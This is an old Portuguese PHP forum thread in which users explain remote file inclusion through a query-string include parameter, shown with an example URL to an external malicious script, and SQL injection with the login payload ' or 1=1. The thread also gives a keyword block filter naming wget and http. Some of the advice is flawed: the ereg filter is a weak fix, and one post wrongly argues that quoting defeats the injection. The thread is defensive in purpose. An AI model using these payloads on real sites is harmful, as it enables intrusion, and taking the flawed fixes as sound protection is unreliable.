obs.: não tenho a mínima idéia de como ele faz isso
valew
Proteção Contra Hacker
Started By Gabriel_HM, 10/10/2004, 11:39
42 replies to this topic
#1
Gabriel_HM
-
- Usuários
-
- 8 posts
Novato no fórum
- Sexo:Não informado
Posted 10/10/2004, 11:39
Bom, conheço um cara que hackeia servidores pela string ? que fica na url. Existe alguma forma de combater isso?
obs.: não tenho a mínima idéia de como ele faz isso
valew
obs.: não tenho a mínima idéia de como ele faz isso
valew
#2
ThalesWeb
-
- Usuários
-
- 1435 posts
Veterano
- Sexo:Masculino
- Localidade:São Paulo - SP
Posted 10/10/2004, 11:41
Hackeia servidores pela url? Nunca ouvi falar, uma maneira de segurança, é colocar um anti-SQLInjection: http://www.phpbrasil...icle.php/id/680.
Abraços
Abraços
Thales Santos
#3
Stormbringer
-
- Ex-Admins
-
- 2927 posts
I'd love to stay with you all
- Sexo:Não informado
- Localidade:Goiânia - GO
- Interesses:Atualmente: pesquisa e desenvolvimento de web-games
Posted 10/10/2004, 12:28
sim, isso existe!!!!!!!
em sites que usam coisas do tipo
www.site.com.br/site.php?pagina=batatinha.php
e batatinha.php é carregada(por include) no corpo de site.php
o que o hacker faz:
www.site.com.br/site.php?pagina=http://site.com/codigomalicioso.php
como, geralmente, os sites carregam as informaçoes de conexao com o mysql e as vezes upload, o script malicioso pode acessar esses recursos, e, bem, jah sabemos o que pode acontecer.
e nao adianta suprimir o .php da query-string e colocar, depois, pois o hacker pode continuar fazendo assim
www.site.com.br/site.php?pagina=http://site.com/codigomalicioso
uma maneira de previnir isso, e colocando algo do tipo:
vc verifica a existencia de algumas coisas na variavel que esta guardando o nome da pagina que vc vai "includar", e caso ela contenha essas coisas conhecidamente perigosas, vc direciona o cara pruma pagina pre-definida e nao deixa carregar nada externo
bom, eu jah fui invadido quando nao usava isso, mas tentem agora:
http://www.route10.c...a.com/teste.php
em sites que usam coisas do tipo
www.site.com.br/site.php?pagina=batatinha.php
e batatinha.php é carregada(por include) no corpo de site.php
o que o hacker faz:
www.site.com.br/site.php?pagina=http://site.com/codigomalicioso.php
como, geralmente, os sites carregam as informaçoes de conexao com o mysql e as vezes upload, o script malicioso pode acessar esses recursos, e, bem, jah sabemos o que pode acontecer.
e nao adianta suprimir o .php da query-string e colocar, depois, pois o hacker pode continuar fazendo assim
www.site.com.br/site.php?pagina=http://site.com/codigomalicioso
uma maneira de previnir isso, e colocando algo do tipo:
$x = ereg("http|ftp|https|www|wget", $pagina);
if ($x)
$pagina="hackers.php";
include($pagina);
vc verifica a existencia de algumas coisas na variavel que esta guardando o nome da pagina que vc vai "includar", e caso ela contenha essas coisas conhecidamente perigosas, vc direciona o cara pruma pagina pre-definida e nao deixa carregar nada externo
bom, eu jah fui invadido quando nao usava isso, mas tentem agora:
http://www.route10.c...a.com/teste.php
๑۩۞۩๑Let the Carnage Begin!!๑۩۞۩๑
#4
Gabriel_HM
-
- Usuários
-
- 8 posts
Novato no fórum
- Sexo:Não informado
Posted 10/10/2004, 12:58
Valew mesmo, tomara que funcione como proteção 
#5
Stormbringer
-
- Ex-Admins
-
- 2927 posts
I'd love to stay with you all
- Sexo:Não informado
- Localidade:Goiânia - GO
- Interesses:Atualmente: pesquisa e desenvolvimento de web-games
Posted 10/10/2004, 13:34
caso vc esteja hospedado num servidor publico, ou com varios sites de outras pessoas, faça a vericicação de .. e / tambem...Valew mesmo, tomara que funcione como proteção
๑۩۞۩๑Let the Carnage Begin!!๑۩۞۩๑
#6
## Dark Angell ##
## Dark Angell ##
-
- Visitantes
Posted 10/10/2004, 14:45
isso acontecia (naum sei se acontece ainda) com o PHP-Nuke, tenho amigos q tiveram o site deles totalmente modificados, mas hoje, nem mexo mais tanto com PHP-Nuke, e não sei mais a frequencia disso......
#7
Viper
-
- Usuários
-
- 13 posts
Novato no fórum
- Sexo:Não informado
- Localidade:Sao Paulo
Posted 10/10/2004, 14:55
mto boa essa dica...
seria legal se o pessoal fizesse algum post só com estas dicas de segurança, pq a maioria do pessoal não conhece as brechas q existem no php...
flws...
seria legal se o pessoal fizesse algum post só com estas dicas de segurança, pq a maioria do pessoal não conhece as brechas q existem no php...
flws...
#8
fly2k
-
- Usuários
-
- 2262 posts
Super Veterano
- Sexo:Não informado
Posted 10/10/2004, 15:45
soh pra constar...mto boa essa dica...
seria legal se o pessoal fizesse algum post só com estas dicas de segurança, pq a maioria do pessoal não conhece as brechas q existem no php...
flws...
Não é brecha do PHP! e sim do pogramador que não implementa uma lógica segura no site, seja por descuido ou po falta de conhecimento.
Quer aprender PHP? -> www.manjaphp.com.br
Tutoriais, código colaborativo (pastebin), curso de PHP, artigos e etc.
Tutoriais, código colaborativo (pastebin), curso de PHP, artigos e etc.
#9
thiagorsl
-
- Ex-Admins
-
- 1151 posts
Ex-admin xD
- Sexo:Não informado
- Localidade:Sampa
- Interesses:http://sermaldito.amovoce.net/
Posted 10/10/2004, 15:54
Há dezenas de falhas e uma procurada aqui mesmo ia dar uma aliviada .....
A que mais me surpreendeu foi a do login ' or 1=1 ....
Vamos lá dar uma explicada ......
Quando você faz um select no banco para selecionar o usuário correto você seleciona assim ...
A que mais me surpreendeu foi a do login ' or 1=1 ....
Vamos lá dar uma explicada ......
Quando você faz um select no banco para selecionar o usuário correto você seleciona assim ...
| PHP |
| <?php $sql="select * from tabela where login='".$login."' and senha='".$senha."'"; ?> |
Então se o kra preenche nos campos ' or 1=1 ficaria assim o select ....
select * from tabela where login='' or 1=1 and senha='' or 1=1
OU seja vai retornar o ultimo resultado pois 1 é igual a 1 (1=1)
Eu nem lembro se está certo do jeito que coloquei mais lembro que o Cris explicou aqui uma vez e era algo bem semelhante com isso dá para ser ideia de como ocorre as brechas dos programados ...
#10
Welington
-
- Usuários
-
- 305 posts
Ativo
- Sexo:Não informado
- Localidade:Taubaté - SP
- Interesses:Sandra Bullock<br>Alias<br>---<br>Webdesign<br>ASP<br>PHP<br>---
Posted 10/10/2004, 15:56
e se eu usar um switch ao inves do nome da pagina na query para validar, tipo
$pagina = addslashes($_GET["pg"]);
switch ($pagina)
{
case "downloads":
$inclusao = "downloads.php";
break;
case "fotos":
$inclusao = "fotos.php";
break;
default:
$inclusao = "mesmapagina.php";
}
#11
thiagorsl
-
- Ex-Admins
-
- 1151 posts
Ex-admin xD
- Sexo:Não informado
- Localidade:Sampa
- Interesses:http://sermaldito.amovoce.net/
Posted 10/10/2004, 16:03
Isso já impede bastante coisapois somente irão ser os que você colocar lá, pórem a grande maioria não faz assim pois prefere algo que não necessite se mecher basta "brincar" com a url ..e se eu usar um switch ao inves do nome da pagina na query para validar, tipo
$pagina = addslashes($_GET["pg"]); switch ($pagina) { case "downloads": $inclusao = "downloads.php"; break; case "fotos": $inclusao = "fotos.php"; break; default: $inclusao = "mesmapagina.php"; }
#12
Welington
-
- Usuários
-
- 305 posts
Ativo
- Sexo:Não informado
- Localidade:Taubaté - SP
- Interesses:Sandra Bullock<br>Alias<br>---<br>Webdesign<br>ASP<br>PHP<br>---
Posted 10/10/2004, 16:07
mas no caso esse switch impede totalmente que um trouxa tome conta da url?
#13
thiagorsl
-
- Ex-Admins
-
- 1151 posts
Ex-admin xD
- Sexo:Não informado
- Localidade:Sampa
- Interesses:http://sermaldito.amovoce.net/
Posted 10/10/2004, 16:08
Sim, em relação as querys strings sim .....mas no caso esse switch impede totalmente que um trouxa tome conta da url?
#14
Stormbringer
-
- Ex-Admins
-
- 2927 posts
I'd love to stay with you all
- Sexo:Não informado
- Localidade:Goiânia - GO
- Interesses:Atualmente: pesquisa e desenvolvimento de web-games
Posted 10/10/2004, 16:38
sem duvida... mas imagine que seu site cresça, cresça, e fique com 5000 paginas... esse switch vai ficar bizarro, hehehemas no caso esse switch impede totalmente que um trouxa tome conta da url?
entao o pequeno "paliativo" que eu postei la em cima é "suave" e funciona, sem precisar criar um case pra cada pagina...
outra coisa, scripts prontos: milhares de open sources que já vi, como phplojafacil e outros tem falhas semelhantes...
não é falha do php, como o fly disse, é falha de programador, e eu já cometi esse erro...
ah, o do login, se vc puser com 'essas aspas simples' dificil o cara burlar assim:
select * from tabela where login='' or 1=1 and senha='' or 1=1
porque, se vc tiver 2 campos, user e senha e o cara preencher or 1=1 junto com o user, ficaria assim a query
select * from tabela where login='or 1=1' and senha=''
se fizer na senha:
select * from tabela where login='' and senha='or 1=1'
mesmo se ele por algo mais nos campos
select * from tabela where login='qualquer' and senha='senha or 1=1'
notem, nao vai achar registro algum, hehehe
๑۩۞۩๑Let the Carnage Begin!!๑۩۞۩๑
#15
Hyoga de Cisne
-
- Banidos
-
- 359 posts
Ativo
- Sexo:Não informado
- Interesses:Gosto muito de PHP, adoro Webdesign. Sou muito fã de ROCK! Gosto de ajudar à quem precisa, e merece...<br>Gosto de sempre estar atualizado de aprender mais a cada dia que se passa...
Posted 10/10/2004, 16:44
Não entendi como o hacker faz a pagina pra aparecer os codigos...
Expliquem como seria e deem um exemp0lo se puderem...
Como seria essa pagina "codigomalicioso.php"?www.site.com.br/site.php?pagina=http://site.com/codigomalicioso.php
Expliquem como seria e deem um exemp0lo se puderem...
hyoga.de.cisne
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
AnimeSchool.com.br - O Melhor em animes, com muitos episódios, informação e muito mais!
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
AnimeSchool.com.br - O Melhor em animes, com muitos episódios, informação e muito mais!
2 user(s) are reading this topic
0 membro(s), 2 visitante(s) e 0 membros anônimo(s)
